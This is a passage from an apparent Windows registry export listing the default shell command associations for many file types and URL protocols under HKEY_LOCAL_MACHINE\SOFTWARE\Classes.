HKEY_LOCAL_MACHINE\SOFTWARE\Classes\giffile\shell\Open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\giffile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\gmmpfile\shell\Install Profile\command (Default) REG_SZ "colorcpl.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\edit\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Print "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\winhlp32.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htafile\Shell\Open\Command (Default) REG_SZ C:\Windows\System32\mshta.exe "%1" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}%U{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htmlfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htmlfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\http\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\https\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\icmfile\shell\Install Profile\command (Default) REG_SZ "colorcpl.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.HTM\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.HTM\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.HTM\shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.HTM\shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.MHT\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.MHT\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.PARTIAL\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.SVG\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.SVG\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.SVG\shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.SVG\shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.URL\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.URL\Shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.URL\Shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.WEBSITE\Shell\Open\Command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -w "%l" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.XHT\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.XHT\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.XHT\shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintXHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.XHT\shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintXHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.FTP\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.HTTP\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.HTTPS\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IMEDictionaryCompiler\shell\open\command (Default) REG_EXPAND_SZ "%WINDIR%\system32\IME\SHARED\imewdbld.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\imesxfile\shell\open\command (Default) REG_EXPAND_SZ "%WINDIR%\system32\IME\SHARED\imesearch.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\Install\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\InfDefaultInstall.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\shell\Open\Command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Edit\Command (Default) REG_SZ C:\Windows\System32\Notepad.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Open\Command (Default) REG_SZ C:\Windows\System32\WScript.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Open2\Command (Default) REG_SZ C:\Windows\System32\CScript.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Print\Command (Default) REG_SZ C:\Windows\System32\Notepad.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\Shell\Edit\Command (Default) REG_SZ C:\Windows\System32\Notepad.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\Shell\Open\Command (Default) REG_SZ C:\Windows\System32\WScript.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\Shell\Open2\Command (Default) REG_SZ C:\Windows\System32\CScript.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\Shell\Print\Command (Default) REG_SZ C:\Windows\System32\Notepad.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Launcher.Computer\Shell\Manage\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\CompMgmtLauncher.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LpkSetup.1\Shell\install\command (Default) REG_EXPAND_SZ %systemroot%\system32\lpksetup.exe /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Internet Explorer\iexplore.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mhtmlfile\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellConsole.1\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellData.1\Shell\Edit\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellData.1\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellModule.1\Shell\Edit\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellModule.1\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellScript.1\Shell\0\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & '%1'" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellScript.1\Shell\Edit\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellScript.1\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.ProvTool.Provisioning.1\Shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\provtool.exe" "%1" /source ShellOpen HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.System.Update.1\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\wusa.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.Website\Shell\Open\Command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -w "%l" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.Workfolders\Shell\Open\command (Default) REG_SZ C:\Windows\System32\control.exe /name Microsoft.WorkFolders HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MMS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Media Player\wmplayer.exe" "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-availablenetworks\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-mmsys\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-msdt\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\msdt.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-msime-imepad\shell\open\command (Default) REG_SZ C:\Windows\System32\IME\SHARED\IMEPADSV.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-msime-imjpdct\shell\open\command (Default) REG_SZ C:\Windows\System32\IME\IMEJP\IMJPDCT.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-quick-assist\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\quickassist.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-rdx-document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-settings-connectabledevices\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-settings-displays-topology\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-virtualtouchpad\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\Author\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe /a "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\RunAs\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSDASC\shell\open\command (Default) REG_EXPAND_SZ Rundll32.exe "%CommonProgramFiles%\System\OLE DB\oledb32.dll",OpenDSLFile %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /i "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Repair\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /f "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Uninstall\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /x "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Patch\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /p "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSInfoFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msinfo32.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSSppLicenseFile\shell\open\command (Default) REG_SZ "iexplore.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSStorageSense\shell\open\command (Default) REG_EXPAND_SZ explorer ms-settings:storagesense HKEY_LOCAL_MACHINE\SOFTWARE\Classes\msstylesfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NetServer\shell\remotedesktop\command (Default) REG_SZ mstsc.exe -v %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaServer:1\shell\Open Media Player\command (Default) REG_EXPAND_SZ C:\Program Files\Windows Media Player\wmplayer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchdescription\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchfilefolderresult\shell\open\command (Default) REG_SZ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchresult\shell\open\command (Default) REG_SZ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchresult\shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\otffile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\otffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7RFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddP7R %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7RFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7SFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pbkfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasphone.exe -f "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PerfFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pfmfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pfmfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PFXFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddPFX %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PFXFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PhotoViewer.FileAssoc.Tiff\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pjpegfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pngfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\prffile\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ratfile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Connect\command (Default) REG_SZ mstsc.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Edit\command (Default) REG_SZ mstsc.exe -edit "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mstsc.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regedit\shell\open\command (Default) REG_SZ regedit.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command (Default) REG_SZ regedit.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RemoteAssistance.1\Shell\open\command (Default) REG_EXPAND_SZ "%systemRoot%\system32\msra.exe" -openfile "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlogin\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SavedDsQuery\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile\shell\config\command (Default) REG_SZ "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile\shell\install\command (Default) REG_SZ rundll32.exe desk.cpl,InstallScreenSaver %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile\shell\open\command (Default) REG_SZ "%1" /S HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scriptletfile\Shell\Generate Typelib\command (Default) REG_SZ "C:\Windows\System32\RUNDLL32.EXE" "C:\Windows\System32\scrobj.dll",GenerateTypeLib "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scriptletfile\Shell\Open\command (Default) REG_SZ "C:\Windows\System32\NOTEPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scriptletfile\Shell\Register\command (Default) REG_SZ "C:\Windows\System32\REGSVR32.EXE" /i:"%1" "C:\Windows\System32\scrobj.dll" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scriptletfile\Shell\Unregister\command (Default) REG_SZ "C:\Windows\System32\REGSVR32.EXE" /u /n /i:"%1" "C:\Windows\System32\scrobj.dll" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\search\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\search-ms\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SHCmdFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Shell.CDBurn\Shell\Prepare\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,PrepareDiscForBurnRunDll %L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SPCFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddSPC %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SPCFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.3mf\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe 